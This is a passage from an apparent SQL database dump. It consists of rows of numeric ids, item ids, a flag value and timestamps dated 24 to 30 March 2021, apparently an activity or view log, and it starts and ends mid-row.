16:54:58'),(17225,1596,1,'2021-03-24','2021-03-24 17:10:39'),(17226,1604,1,'2021-03-24','2021-03-24 17:17:18'),(17227,91,1,'2021-03-24','2021-03-24 17:38:06'),(17228,68,1,'2021-03-24','2021-03-24 17:39:36'),(17229,472,1,'2021-03-24','2021-03-24 17:41:12'),(17230,2309,1,'2021-03-24','2021-03-24 17:44:52'),(17231,1544,1,'2021-03-24','2021-03-24 17:50:04'),(17232,3265,1,'2021-03-24','2021-03-24 19:17:11'),(17233,1594,1,'2021-03-24','2021-03-24 20:09:38'),(17234,1594,1,'2021-03-24','2021-03-24 20:10:01'),(17235,2769,1,'2021-03-24','2021-03-24 20:26:46'),(17236,2775,1,'2021-03-24','2021-03-24 20:28:51'),(17237,2769,1,'2021-03-24','2021-03-24 20:33:41'),(17238,2989,1,'2021-03-24','2021-03-24 20:49:12'),(17239,1598,1,'2021-03-24','2021-03-24 21:32:37'),(17240,2309,1,'2021-03-24','2021-03-24 22:14:53'),(17241,2769,1,'2021-03-24','2021-03-24 22:22:24'),(17242,2769,1,'2021-03-24','2021-03-24 22:22:27'),(17243,2159,1,'2021-03-24','2021-03-24 22:32:31'),(17244,3030,1,'2021-03-25','2021-03-25 00:26:01'),(17245,1600,1,'2021-03-25','2021-03-25 00:51:39'),(17246,3531,1,'2021-03-25','2021-03-25 01:50:52'),(17247,2769,1,'2021-03-25','2021-03-25 06:14:26'),(17248,2769,1,'2021-03-25','2021-03-25 06:14:38'),(17249,2769,1,'2021-03-25','2021-03-25 06:14:45'),(17250,2769,1,'2021-03-25','2021-03-25 06:22:26'),(17251,1718,1,'2021-03-25','2021-03-25 07:34:50'),(17252,1718,1,'2021-03-25','2021-03-25 07:35:41'),(17253,76,1,'2021-03-25','2021-03-25 07:37:16'),(17254,1718,1,'2021-03-25','2021-03-25 07:39:25'),(17255,1602,1,'2021-03-25','2021-03-25 08:01:25'),(17256,1730,1,'2021-03-25','2021-03-25 08:03:29'),(17257,1592,1,'2021-03-25','2021-03-25 08:37:52'),(17258,2457,1,'2021-03-25','2021-03-25 08:46:04'),(17259,1586,1,'2021-03-25','2021-03-25 08:49:48'),(17260,1598,1,'2021-03-25','2021-03-25 09:00:37'),(17261,1586,1,'2021-03-25','2021-03-25 09:46:37'),(17262,2457,1,'2021-03-25','2021-03-25 10:13:18'),(17263,2309,1,'2021-03-25','2021-03-25 10:18:42'),(17264,1582,1,'2021-03-25','2021-03-25 10:46:09'),(17265,91,1,'2021-03-25','2021-03-25 10:46:31'),(17266,68,1,'2021-03-25','2021-03-25 10:49:38'),(17267,68,1,'2021-03-25','2021-03-25 10:50:59'),(17268,470,1,'2021-03-25','2021-03-25 11:17:08'),(17269,471,1,'2021-03-25','2021-03-25 11:19:27'),(17270,470,1,'2021-03-25','2021-03-25 11:21:06'),(17271,467,1,'2021-03-25','2021-03-25 11:21:13'),(17272,473,1,'2021-03-25','2021-03-25 11:21:59'),(17273,467,1,'2021-03-25','2021-03-25 11:22:11'),(17274,470,1,'2021-03-25','2021-03-25 11:22:27'),(17275,1604,1,'2021-03-25','2021-03-25 11:28:20'),(17276,1600,1,'2021-03-25','2021-03-25 11:38:13'),(17277,1600,1,'2021-03-25','2021-03-25 11:42:06'),(17278,3267,1,'2021-03-25','2021-03-25 11:43:14'),(17279,91,1,'2021-03-25','2021-03-25 11:46:39'),(17280,1612,1,'2021-03-25','2021-03-25 11:47:17'),(17281,1598,1,'2021-03-25','2021-03-25 11:48:49'),(17282,1600,1,'2021-03-25','2021-03-25 11:50:09'),(17283,2748,1,'2021-03-25','2021-03-25 11:50:34'),(17284,1612,1,'2021-03-25','2021-03-25 11:54:45'),(17285,80,1,'2021-03-25','2021-03-25 11:57:26'),(17286,91,1,'2021-03-25','2021-03-25 12:17:04'),(17287,1582,1,'2021-03-25','2021-03-25 12:18:54'),(17288,80,1,'2021-03-25','2021-03-25 12:20:08'),(17289,1604,1,'2021-03-25','2021-03-25 12:22:40'),(17290,1544,1,'2021-03-25','2021-03-25 12:23:46'),(17291,1600,1,'2021-03-25','2021-03-25 12:25:49'),(17292,1582,1,'2021-03-25','2021-03-25 12:27:31'),(17293,1544,1,'2021-03-25','2021-03-25 12:28:18'),(17294,1604,1,'2021-03-25','2021-03-25 12:28:24'),(17295,2769,1,'2021-03-25','2021-03-25 12:37:44'),(17296,2769,1,'2021-03-25','2021-03-25 12:37:44'),(17297,2769,1,'2021-03-25','2021-03-25 12:37:45'),(17298,3534,1,'2021-03-25','2021-03-25 12:41:13'),(17299,1582,1,'2021-03-25','2021-03-25 12:41:52'),(17300,87,1,'2021-03-25','2021-03-25 12:46:24'),(17301,91,1,'2021-03-25','2021-03-25 12:46:42'),(17302,72,1,'2021-03-25','2021-03-25 12:49:30'),(17303,80,1,'2021-03-25','2021-03-25 13:08:57'),(17304,3531,1,'2021-03-25','2021-03-25 13:13:11'),(17305,76,1,'2021-03-25','2021-03-25 13:41:28'),(17306,3030,1,'2021-03-25','2021-03-25 14:26:43'),(17307,1612,1,'2021-03-25','2021-03-25 14:41:32'),(17308,1594,1,'2021-03-25','2021-03-25 15:11:05'),(17309,3005,1,'2021-03-25','2021-03-25 16:28:30'),(17310,2457,1,'2021-03-25','2021-03-25 17:17:17'),(17311,2609,1,'2021-03-25','2021-03-25 18:11:11'),(17312,2457,1,'2021-03-25','2021-03-25 18:39:07'),(17313,3541,1,'2021-03-25','2021-03-25 18:52:18'),(17314,1594,1,'2021-03-25','2021-03-25 19:10:38'),(17315,72,1,'2021-03-25','2021-03-25 19:48:48'),(17316,3585,1,'2021-03-25','2021-03-25 19:49:19'),(17317,3585,1,'2021-03-25','2021-03-25 19:50:23'),(17318,72,1,'2021-03-25','2021-03-25 19:51:38'),(17319,3585,1,'2021-03-25','2021-03-25 19:52:06'),(17320,1586,1,'2021-03-25','2021-03-25 19:54:36'),(17321,1588,1,'2021-03-25','2021-03-25 20:14:34'),(17322,1594,1,'2021-03-25','2021-03-25 21:26:06'),(17323,2751,1,'2021-03-25','2021-03-25 22:15:06'),(17324,1586,1,'2021-03-26','2021-03-26 01:01:29'),(17325,3267,1,'2021-03-26','2021-03-26 02:45:49'),(17326,1602,1,'2021-03-26','2021-03-26 03:11:17'),(17327,1602,1,'2021-03-26','2021-03-26 03:11:29'),(17328,1602,1,'2021-03-26','2021-03-26 03:31:05'),(17329,2751,1,'2021-03-26','2021-03-26 04:56:29'),(17330,1590,1,'2021-03-26','2021-03-26 06:56:33'),(17331,106,1,'2021-03-26','2021-03-26 06:56:50'),(17332,3253,1,'2021-03-26','2021-03-26 08:07:53'),(17333,3307,1,'2021-03-26','2021-03-26 08:17:50'),(17334,3030,1,'2021-03-26','2021-03-26 08:19:47'),(17335,3124,1,'2021-03-26','2021-03-26 08:27:35'),(17336,1705,1,'2021-03-26','2021-03-26 08:37:43'),(17337,3249,1,'2021-03-26','2021-03-26 08:57:19'),(17338,3534,1,'2021-03-26','2021-03-26 09:05:15'),(17339,3307,1,'2021-03-26','2021-03-26 09:07:20'),(17340,3124,1,'2021-03-26','2021-03-26 09:27:31'),(17341,1584,1,'2021-03-26','2021-03-26 09:37:25'),(17342,1594,1,'2021-03-26','2021-03-26 09:43:20'),(17343,1598,1,'2021-03-26','2021-03-26 09:57:36'),(17344,1598,1,'2021-03-26','2021-03-26 10:10:28'),(17345,3479,1,'2021-03-26','2021-03-26 10:38:19'),(17346,1703,1,'2021-03-26','2021-03-26 11:31:23'),(17347,3271,1,'2021-03-26','2021-03-26 11:48:14'),(17348,108,1,'2021-03-26','2021-03-26 11:53:58'),(17349,106,1,'2021-03-26','2021-03-26 12:01:34'),(17350,3181,1,'2021-03-26','2021-03-26 12:12:17'),(17351,1584,1,'2021-03-26','2021-03-26 12:27:20'),(17352,3479,1,'2021-03-26','2021-03-26 12:40:10'),(17353,2804,1,'2021-03-26','2021-03-26 12:40:44'),(17354,2411,1,'2021-03-26','2021-03-26 12:49:02'),(17355,2609,1,'2021-03-26','2021-03-26 13:09:12'),(17356,1600,1,'2021-03-26','2021-03-26 13:39:25'),(17357,2769,1,'2021-03-26','2021-03-26 14:17:10'),(17358,1588,1,'2021-03-26','2021-03-26 14:33:22'),(17359,1606,1,'2021-03-26','2021-03-26 14:42:36'),(17360,1610,1,'2021-03-26','2021-03-26 15:19:33'),(17361,3069,1,'2021-03-26','2021-03-26 15:29:17'),(17362,1544,1,'2021-03-26','2021-03-26 16:08:54'),(17363,1586,1,'2021-03-26','2021-03-26 16:23:13'),(17364,2309,1,'2021-03-26','2021-03-26 16:29:25'),(17365,1586,1,'2021-03-26','2021-03-26 16:30:39'),(17366,1586,1,'2021-03-26','2021-03-26 16:30:52'),(17367,3253,1,'2021-03-26','2021-03-26 17:16:46'),(17368,3030,1,'2021-03-26','2021-03-26 17:22:07'),(17369,2159,1,'2021-03-26','2021-03-26 17:26:53'),(17370,1544,1,'2021-03-26','2021-03-26 17:33:46'),(17371,3109,1,'2021-03-26','2021-03-26 17:47:09'),(17372,1614,1,'2021-03-26','2021-03-26 17:57:56'),(17373,2309,1,'2021-03-26','2021-03-26 18:05:41'),(17374,2309,1,'2021-03-26','2021-03-26 18:07:09'),(17375,3030,1,'2021-03-26','2021-03-26 18:07:44'),(17376,1741,1,'2021-03-26','2021-03-26 18:17:19'),(17377,1594,1,'2021-03-26','2021-03-26 18:25:42'),(17378,2809,1,'2021-03-26','2021-03-26 18:27:27'),(17379,1606,1,'2021-03-26','2021-03-26 18:37:27'),(17380,3175,1,'2021-03-26','2021-03-26 19:07:43'),(17381,1741,1,'2021-03-26','2021-03-26 19:17:54'),(17382,3307,1,'2021-03-26','2021-03-26 19:27:52'),(17383,3257,1,'2021-03-26','2021-03-26 19:37:44'),(17384,1604,1,'2021-03-26','2021-03-26 19:50:09'),(17385,3063,1,'2021-03-26','2021-03-26 19:57:40'),(17386,2809,1,'2021-03-26','2021-03-26 20:07:53'),(17387,2769,1,'2021-03-26','2021-03-26 20:48:07'),(17388,2159,1,'2021-03-26','2021-03-26 20:58:30'),(17389,2309,1,'2021-03-26','2021-03-26 21:04:13'),(17390,2609,1,'2021-03-26','2021-03-26 21:08:26'),(17391,1582,1,'2021-03-26','2021-03-26 21:28:57'),(17392,1602,1,'2021-03-26','2021-03-26 21:39:06'),(17393,3058,1,'2021-03-26','2021-03-26 21:49:07'),(17394,1602,1,'2021-03-26','2021-03-26 22:21:48'),(17395,1588,1,'2021-03-26','2021-03-26 22:57:22'),(17396,2804,1,'2021-03-26','2021-03-26 23:09:34'),(17397,570,1,'2021-03-26','2021-03-26 23:27:37'),(17398,1586,1,'2021-03-26','2021-03-26 23:45:35'),(17399,1600,1,'2021-03-27','2021-03-27 00:03:35'),(17400,2769,1,'2021-03-27','2021-03-27 00:21:35'),(17401,1602,1,'2021-03-27','2021-03-27 01:18:21'),(17402,1602,1,'2021-03-27','2021-03-27 01:20:07'),(17403,2178,1,'2021-03-27','2021-03-27 01:33:33'),(17404,1602,1,'2021-03-27','2021-03-27 01:51:33'),(17405,1598,1,'2021-03-27','2021-03-27 02:09:34'),(17406,2410,1,'2021-03-27','2021-03-27 02:45:39'),(17407,1610,1,'2021-03-27','2021-03-27 03:03:35'),(17408,2309,1,'2021-03-27','2021-03-27 03:21:33'),(17409,2159,1,'2021-03-27','2021-03-27 03:52:03'),(17410,3109,1,'2021-03-27','2021-03-27 04:15:42'),(17411,1594,1,'2021-03-27','2021-03-27 04:19:02'),(17412,108,1,'2021-03-27','2021-03-27 04:39:44'),(17413,108,1,'2021-03-27','2021-03-27 04:41:26'),(17414,1586,1,'2021-03-27','2021-03-27 04:51:35'),(17415,2159,1,'2021-03-27','2021-03-27 04:52:01'),(17416,3109,1,'2021-03-27','2021-03-27 05:09:32'),(17417,2309,1,'2021-03-27','2021-03-27 05:45:33'),(17418,2658,1,'2021-03-27','2021-03-27 06:04:21'),(17419,1604,1,'2021-03-27','2021-03-27 06:57:33'),(17420,1594,1,'2021-03-27','2021-03-27 07:12:01'),(17421,1598,1,'2021-03-27','2021-03-27 07:15:33'),(17422,1718,1,'2021-03-27','2021-03-27 07:33:34'),(17423,3030,1,'2021-03-27','2021-03-27 07:34:43'),(17424,2609,1,'2021-03-27','2021-03-27 07:51:33'),(17425,2769,1,'2021-03-27','2021-03-27 08:09:33'),(17426,1588,1,'2021-03-27','2021-03-27 08:27:32'),(17427,3531,1,'2021-03-27','2021-03-27 08:35:06'),(17428,1544,1,'2021-03-27','2021-03-27 08:58:51'),(17429,1582,1,'2021-03-27','2021-03-27 09:14:31'),(17430,1582,1,'2021-03-27','2021-03-27 09:30:25'),(17431,1594,1,'2021-03-27','2021-03-27 09:38:16'),(17432,1594,1,'2021-03-27','2021-03-27 09:39:33'),(17433,91,1,'2021-03-27','2021-03-27 09:40:01'),(17434,68,1,'2021-03-27','2021-03-27 09:40:34'),(17435,570,1,'2021-03-27','2021-03-27 09:45:51'),(17436,1600,1,'2021-03-27','2021-03-27 09:54:36'),(17437,91,1,'2021-03-27','2021-03-27 10:01:38'),(17438,3253,1,'2021-03-27','2021-03-27 10:32:47'),(17439,1602,1,'2021-03-27','2021-03-27 10:42:37'),(17440,1602,1,'2021-03-27','2021-03-27 10:42:48'),(17441,2617,1,'2021-03-27','2021-03-27 10:48:25'),(17442,2813,1,'2021-03-27','2021-03-27 11:04:59'),(17443,110,1,'2021-03-27','2021-03-27 11:35:22'),(17444,110,1,'2021-03-27','2021-03-27 12:22:22'),(17445,2309,1,'2021-03-27','2021-03-27 12:35:41'),(17446,2309,1,'2021-03-27','2021-03-27 12:35:46'),(17447,1600,1,'2021-03-27','2021-03-27 12:37:59'),(17448,3034,1,'2021-03-27','2021-03-27 12:53:41'),(17449,2178,1,'2021-03-27','2021-03-27 13:40:43'),(17450,1602,1,'2021-03-27','2021-03-27 13:55:13'),(17451,1600,1,'2021-03-27','2021-03-27 14:00:15'),(17452,76,1,'2021-03-27','2021-03-27 14:01:06'),(17453,1600,1,'2021-03-27','2021-03-27 14:02:08'),(17454,84,1,'2021-03-27','2021-03-27 14:02:26'),(17455,3030,1,'2021-03-27','2021-03-27 14:12:01'),(17456,3004,1,'2021-03-27','2021-03-27 14:27:35'),(17457,1602,1,'2021-03-27','2021-03-27 14:34:05'),(17458,1602,1,'2021-03-27','2021-03-27 14:43:24'),(17459,2419,1,'2021-03-27','2021-03-27 14:51:32'),(17460,1586,1,'2021-03-27','2021-03-27 14:58:54'),(17461,2813,1,'2021-03-27','2021-03-27 15:14:31'),(17462,1596,1,'2021-03-27','2021-03-27 15:30:11'),(17463,1582,1,'2021-03-27','2021-03-27 15:43:46'),(17464,3034,1,'2021-03-27','2021-03-27 15:45:48'),(17465,2159,1,'2021-03-27','2021-03-27 16:14:35'),(17466,1699,1,'2021-03-27','2021-03-27 16:15:20'),(17467,1582,1,'2021-03-27','2021-03-27 16:15:53'),(17468,3307,1,'2021-03-27','2021-03-27 16:48:28'),(17469,1588,1,'2021-03-27','2021-03-27 17:04:19'),(17470,1718,1,'2021-03-27','2021-03-27 17:19:43'),(17471,2911,1,'2021-03-27','2021-03-27 17:35:26'),(17472,1604,1,'2021-03-27','2021-03-27 18:15:07'),(17473,3053,1,'2021-03-27','2021-03-27 18:22:28'),(17474,2557,1,'2021-03-27','2021-03-27 18:53:45'),(17475,2769,1,'2021-03-27','2021-03-27 19:09:17'),(17476,80,1,'2021-03-27','2021-03-27 19:18:05'),(17477,76,1,'2021-03-27','2021-03-27 19:21:38'),(17478,76,1,'2021-03-27','2021-03-27 19:22:24'),(17479,80,1,'2021-03-27','2021-03-27 19:22:27'),(17480,1614,1,'2021-03-27','2021-03-27 19:40:39'),(17481,1594,1,'2021-03-27','2021-03-27 20:11:55'),(17482,3259,1,'2021-03-27','2021-03-27 20:27:33'),(17483,570,1,'2021-03-27','2021-03-27 20:33:09'),(17484,3030,1,'2021-03-27','2021-03-27 20:58:51'),(17485,3273,1,'2021-03-27','2021-03-27 21:14:30'),(17486,1604,1,'2021-03-27','2021-03-27 21:30:10'),(17487,2751,1,'2021-03-27','2021-03-27 21:45:48'),(17488,3127,1,'2021-03-27','2021-03-27 22:01:30'),(17489,1600,1,'2021-03-27','2021-03-27 22:32:48'),(17490,3257,1,'2021-03-27','2021-03-27 22:48:27'),(17491,468,1,'2021-03-27','2021-03-27 23:04:04'),(17492,1606,1,'2021-03-27','2021-03-27 23:35:22'),(17493,2609,1,'2021-03-28','2021-03-28 00:06:40'),(17494,2775,1,'2021-03-28','2021-03-28 00:22:23'),(17495,1598,1,'2021-03-28','2021-03-28 00:44:31'),(17496,1598,1,'2021-03-28','2021-03-28 00:44:38'),(17497,80,1,'2021-03-28','2021-03-28 00:53:43'),(17498,3479,1,'2021-03-28','2021-03-28 01:09:16'),(17499,1612,1,'2021-03-28','2021-03-28 01:24:57'),(17500,89,1,'2021-03-28','2021-03-28 01:40:38'),(17501,3541,1,'2021-03-28','2021-03-28 01:56:23'),(17502,1614,1,'2021-03-28','2021-03-28 02:11:53'),(17503,1594,1,'2021-03-28','2021-03-28 02:27:34'),(17504,3316,1,'2021-03-28','2021-03-28 02:43:10'),(17505,2804,1,'2021-03-28','2021-03-28 02:58:53'),(17506,3498,1,'2021-03-28','2021-03-28 03:14:32'),(17507,2420,1,'2021-03-28','2021-03-28 03:30:10'),(17508,2309,1,'2021-03-28','2021-03-28 03:42:47'),(17509,470,1,'2021-03-28','2021-03-28 04:17:10'),(17510,3280,1,'2021-03-28','2021-03-28 04:32:48'),(17511,2775,1,'2021-03-28','2021-03-28 05:04:06'),(17512,1602,1,'2021-03-28','2021-03-28 05:19:42'),(17513,1602,1,'2021-03-28','2021-03-28 05:35:23'),(17514,3534,1,'2021-03-28','2021-03-28 05:51:01'),(17515,91,1,'2021-03-28','2021-03-28 06:06:43'),(17516,2159,1,'2021-03-28','2021-03-28 06:53:08'),(17517,2809,1,'2021-03-28','2021-03-28 06:53:38'),(17518,84,1,'2021-03-28','2021-03-28 07:06:06'),(17519,1743,1,'2021-03-28','2021-03-28 07:09:17'),(17520,2159,1,'2021-03-28','2021-03-28 07:23:09'),(17521,2410,1,'2021-03-28','2021-03-28 07:24:56'),(17522,3253,1,'2021-03-28','2021-03-28 07:40:37'),(17523,1602,1,'2021-03-28','2021-03-28 07:58:23'),(17524,2804,1,'2021-03-28','2021-03-28 08:27:34'),(17525,468,1,'2021-03-28','2021-03-28 08:58:53'),(17526,1766,1,'2021-03-28','2021-03-28 09:14:30'),(17527,76,1,'2021-03-28','2021-03-28 10:01:28'),(17528,1612,1,'2021-03-28','2021-03-28 10:15:52'),(17529,3257,1,'2021-03-28','2021-03-28 10:17:07'),(17530,3489,1,'2021-03-28','2021-03-28 10:32:46'),(17531,1778,1,'2021-03-28','2021-03-28 10:46:17'),(17532,2410,1,'2021-03-28','2021-03-28 10:48:27'),(17533,3109,1,'2021-03-28','2021-03-28 11:04:06'),(17534,2309,1,'2021-03-28','2021-03-28 11:19:45'),(17535,3034,1,'2021-03-28','2021-03-28 11:35:22'),(17536,570,1,'2021-03-28','2021-03-28 11:51:21'),(17537,1718,1,'2021-03-28','2021-03-28 12:06:51'),(17538,74,1,'2021-03-28','2021-03-28 13:40:35'),(17539,2769,1,'2021-03-28','2021-03-28 13:52:59'),(17540,2769,1,'2021-03-28','2021-03-28 13:53:02'),(17541,74,1,'2021-03-28','2021-03-28 13:56:17'),(17542,3030,1,'2021-03-28','2021-03-28 14:11:54'),(17543,1774,1,'2021-03-28','2021-03-28 14:27:33'),(17544,3313,1,'2021-03-28','2021-03-28 14:43:17'),(17545,1726,1,'2021-03-28','2021-03-28 14:50:30'),(17546,1774,1,'2021-03-28','2021-03-28 15:19:59'),(17547,2159,1,'2021-03-28','2021-03-28 15:20:29'),(17548,2159,1,'2021-03-28','2021-03-28 15:50:31'),(17549,2309,1,'2021-03-28','2021-03-28 18:13:59'),(17550,1544,1,'2021-03-28','2021-03-28 18:18:29'),(17551,1606,1,'2021-03-28','2021-03-28 18:24:11'),(17552,108,1,'2021-03-28','2021-03-28 18:31:20'),(17553,1606,1,'2021-03-28','2021-03-28 20:17:26'),(17554,1582,1,'2021-03-28','2021-03-28 21:40:30'),(17555,91,1,'2021-03-28','2021-03-28 21:42:25'),(17556,87,1,'2021-03-28','2021-03-28 21:48:18'),(17557,480,1,'2021-03-28','2021-03-28 21:56:58'),(17558,1586,1,'2021-03-28','2021-03-28 22:30:44'),(17559,1586,1,'2021-03-29','2021-03-29 00:15:12'),(17560,1586,1,'2021-03-29','2021-03-29 00:15:13'),(17561,1586,1,'2021-03-29','2021-03-29 00:15:16'),(17562,2769,1,'2021-03-29','2021-03-29 01:49:23'),(17563,2769,1,'2021-03-29','2021-03-29 01:49:23'),(17564,2769,1,'2021-03-29','2021-03-29 01:49:38'),(17565,1728,1,'2021-03-29','2021-03-29 03:39:53'),(17566,1732,1,'2021-03-29','2021-03-29 03:40:15'),(17567,1544,1,'2021-03-29','2021-03-29 03:50:30'),(17568,108,1,'2021-03-29','2021-03-29 04:40:51'),(17569,108,1,'2021-03-29','2021-03-29 05:50:51'),(17570,1709,1,'2021-03-29','2021-03-29 06:10:49'),(17571,1586,1,'2021-03-29','2021-03-29 06:39:39'),(17572,1602,1,'2021-03-29','2021-03-29 07:09:10'),(17573,1598,1,'2021-03-29','2021-03-29 08:04:36'),(17574,1598,1,'2021-03-29','2021-03-29 08:04:39'),(17575,1598,1,'2021-03-29','2021-03-29 08:04:39'),(17576,1598,1,'2021-03-29','2021-03-29 08:05:30'),(17577,1598,1,'2021-03-29','2021-03-29 08:08:37'),(17578,80,1,'2021-03-29','2021-03-29 08:38:33'),(17579,80,1,'2021-03-29','2021-03-29 08:42:55'),(17580,80,1,'2021-03-29','2021-03-29 08:52:56'),(17581,1598,1,'2021-03-29','2021-03-29 09:01:43'),(17582,80,1,'2021-03-29','2021-03-29 09:02:16'),(17583,80,1,'2021-03-29','2021-03-29 09:03:58'),(17584,1598,1,'2021-03-29','2021-03-29 09:04:01'),(17585,80,1,'2021-03-29','2021-03-29 09:11:12'),(17586,1600,1,'2021-03-29','2021-03-29 10:01:11'),(17587,1600,1,'2021-03-29','2021-03-29 10:08:36'),(17588,2609,1,'2021-03-29','2021-03-29 11:27:03'),(17589,1602,1,'2021-03-29','2021-03-29 11:55:58'),(17590,68,1,'2021-03-29','2021-03-29 11:56:04'),(17591,1602,1,'2021-03-29','2021-03-29 11:56:08'),(17592,1602,1,'2021-03-29','2021-03-29 12:38:37'),(17593,1594,1,'2021-03-29','2021-03-29 12:39:01'),(17594,1602,1,'2021-03-29','2021-03-29 12:39:16'),(17595,1602,1,'2021-03-29','2021-03-29 13:03:47'),(17596,2309,1,'2021-03-29','2021-03-29 13:08:15'),(17597,1544,1,'2021-03-29','2021-03-29 14:04:38'),(17598,1602,1,'2021-03-29','2021-03-29 14:11:09'),(17599,2490,1,'2021-03-29','2021-03-29 14:34:48'),(17600,1612,1,'2021-03-29','2021-03-29 14:47:57'),(17601,1594,1,'2021-03-29','2021-03-29 14:51:03'),(17602,80,1,'2021-03-29','2021-03-29 14:51:35'),(17603,80,1,'2021-03-29','2021-03-29 14:54:09'),(17604,1594,1,'2021-03-29','2021-03-29 14:54:14'),(17605,80,1,'2021-03-29','2021-03-29 15:20:36'),(17606,1544,1,'2021-03-29','2021-03-29 15:24:29'),(17607,3045,1,'2021-03-29','2021-03-29 15:54:16'),(17608,2457,1,'2021-03-29','2021-03-29 15:59:51'),(17609,80,1,'2021-03-29','2021-03-29 16:01:08'),(17610,2297,1,'2021-03-29','2021-03-29 16:16:16'),(17611,1730,1,'2021-03-29','2021-03-29 16:21:23'),(17612,3313,1,'2021-03-29','2021-03-29 16:25:01'),(17613,570,1,'2021-03-29','2021-03-29 16:46:01'),(17614,570,1,'2021-03-29','2021-03-29 16:46:08'),(17615,1600,1,'2021-03-29','2021-03-29 16:51:47'),(17616,1600,1,'2021-03-29','2021-03-29 17:12:05'),(17617,1600,1,'2021-03-29','2021-03-29 17:12:07'),(17618,1600,1,'2021-03-29','2021-03-29 17:12:09'),(17619,1745,1,'2021-03-29','2021-03-29 17:15:34'),(17620,1745,1,'2021-03-29','2021-03-29 17:15:36'),(17621,1745,1,'2021-03-29','2021-03-29 17:18:25'),(17622,1600,1,'2021-03-29','2021-03-29 17:18:33'),(17623,1614,1,'2021-03-29','2021-03-29 18:12:49'),(17624,1596,1,'2021-03-29','2021-03-29 18:14:26'),(17625,3079,1,'2021-03-29','2021-03-29 18:57:10'),(17626,2395,1,'2021-03-29','2021-03-29 20:00:13'),(17627,2609,1,'2021-03-29','2021-03-29 20:11:18'),(17628,3479,1,'2021-03-29','2021-03-29 20:12:17'),(17629,2609,1,'2021-03-29','2021-03-29 20:19:39'),(17630,3486,1,'2021-03-29','2021-03-29 20:21:29'),(17631,2801,1,'2021-03-29','2021-03-29 20:34:20'),(17632,2395,1,'2021-03-29','2021-03-29 22:02:39'),(17633,2769,1,'2021-03-29','2021-03-29 22:04:14'),(17634,1614,1,'2021-03-29','2021-03-29 22:23:39'),(17635,3541,1,'2021-03-29','2021-03-29 22:24:26'),(17636,3541,1,'2021-03-29','2021-03-29 22:28:55'),(17637,3541,1,'2021-03-29','2021-03-29 22:29:07'),(17638,3541,1,'2021-03-29','2021-03-29 22:29:49'),(17639,1614,1,'2021-03-29','2021-03-29 22:30:02'),(17640,1612,1,'2021-03-29','2021-03-29 22:30:16'),(17641,1602,1,'2021-03-29','2021-03-29 22:31:59'),(17642,1612,1,'2021-03-29','2021-03-29 22:32:32'),(17643,2748,1,'2021-03-29','2021-03-29 22:32:39'),(17644,1730,1,'2021-03-29','2021-03-29 22:33:52'),(17645,2748,1,'2021-03-29','2021-03-29 22:35:35'),(17646,2558,1,'2021-03-29','2021-03-29 22:35:41'),(17647,1730,1,'2021-03-29','2021-03-29 22:35:45'),(17648,1602,1,'2021-03-29','2021-03-29 22:35:48'),(17649,91,1,'2021-03-29','2021-03-29 22:36:21'),(17650,2748,1,'2021-03-29','2021-03-29 22:36:36'),(17651,1612,1,'2021-03-29','2021-03-29 22:36:51'),(17652,1614,1,'2021-03-29','2021-03-29 22:38:55'),(17653,1592,1,'2021-03-29','2021-03-29 22:47:55'),(17654,1592,1,'2021-03-29','2021-03-29 22:47:57'),(17655,1600,1,'2021-03-29','2021-03-29 22:55:25'),(17656,1600,1,'2021-03-29','2021-03-29 22:55:25'),(17657,2490,1,'2021-03-29','2021-03-29 23:23:25'),(17658,3534,1,'2021-03-29','2021-03-29 23:44:09'),(17659,2457,1,'2021-03-29','2021-03-29 23:59:03'),(17660,2457,1,'2021-03-30','2021-03-30 00:04:23'),(17661,467,1,'2021-03-30','2021-03-30 02:25:01'),(17662,3079,1,'2021-03-30','2021-03-30 04:07:14'),(17663,3313,1,'2021-03-30','2021-03-30 04:53:14'),(17664,2457,1,'2021-03-30','2021-03-30 05:09:15'),(17665,1594,1,'2021-03-30','2021-03-30 06:21:45'),(17666,1594,1,'2021-03-30','2021-03-30 06:22:09'),(17667,1586,1,'2021-03-30','2021-03-30 06:35:20'),(17668,3226,1,'2021-03-30','2021-03-30 06:37:41'),(17669,1774,1,'2021-03-30','2021-03-30 06:39:04'),(17670,1606,1,'2021-03-30','2021-03-30 06:45:47'),(17671,3269,1,'2021-03-30','2021-03-30 07:05:35'),(17672,2609,1,'2021-03-30','2021-03-30 07:37:29'),(17673,1594,1,'2021-03-30','2021-03-30 08:14:40'),(17674,84,1,'2021-03-30','2021-03-30 08:29:58'),(17675,1877,1,'2021-03-30','2021-03-30 08:30:05'),(17676,3102,1,'2021-03-30','2021-03-30 09:13:56'),(17677,1612,1,'2021-03-30','2021-03-30 11:18:48'),(17678,1612,1,'2021-03-30','2021-03-30 11:19:20'),(17679,2748,1,'2021-03-30','2021-03-30 11:20:23'),(17680,2748,1,'2021-03-30','2021-03-30 11:20:57'),(17681,570,1,'2021-03-30','2021-03-30 11:25:41'),(17682,570,1,'2021-03-30','2021-03-30 11:33:49'),(17683,570,1,'2021-03-30','2021-03-30 11:34:57'),(17684,2395,1,'2021-03-30','2021-03-30 12:11:08'),(17685,1586,1,'2021-03-30','2021-03-30 12:21:40'),(17686,1602,1,'2021-03-30','2021-03-30 12:21:45'),(17687,87,1,'2021-03-30','2021-03-30 12:22:38'),(17688,84,1,'2021-03-30','2021-03-30 12:23:19'),(17689,76,1,'2021-03-30','2021-03-30 12:24:03'),(17690,3006,1,'2021-03-30','2021-03-30 12:24:50'),(17691,91,1,'2021-03-30','2021-03-30 12:30:28'),(17692,1584,1,'2021-03-30','2021-03-30 12:30:39'),(17693,1584,1,'2021-03-30','2021-03-30 12:30:41'),(17694,1584,1,'2021-03-30','2021-03-30 12:31:32'),(17695,91,1,'2021-03-30','2021-03-30 12:31:52'),(17696,1745,1,'2021-03-30','2021-03-30 12:35:47'),(17697,91,1,'2021-03-30','2021-03-30 12:35:55'),(17698,1713,1,'2021-03-30','2021-03-30 12:37:48'),(17699,91,1,'2021-03-30','2021-03-30 12:40:43'),(17700,3102,1,'2021-03-30','2021-03-30 12:41:19'),(17701,91,1,'2021-03-30','2021-03-30 12:41:41'),(17702,2751,1,'2021-03-30','2021-03-30 12:44:04'),(17703,91,1,'2021-03-30','2021-03-30 12:44:21'),(17704,1697,1,'2021-03-30','2021-03-30 12:45:23'),(17705,91,1,'2021-03-30','2021-03-30 12:45:30'),(17706,1709,1,'2021-03-30','2021-03-30 12:47:32'),(17707,91,1,'2021-03-30','2021-03-30 12:47:49'),(17708,1604,1,'2021-03-30','2021-03-30 14:04:58'),(17709,1612,1,'2021-03-30','2021-03-30 14:07:07'),(17710,91,1,'2021-03-30','2021-03-30 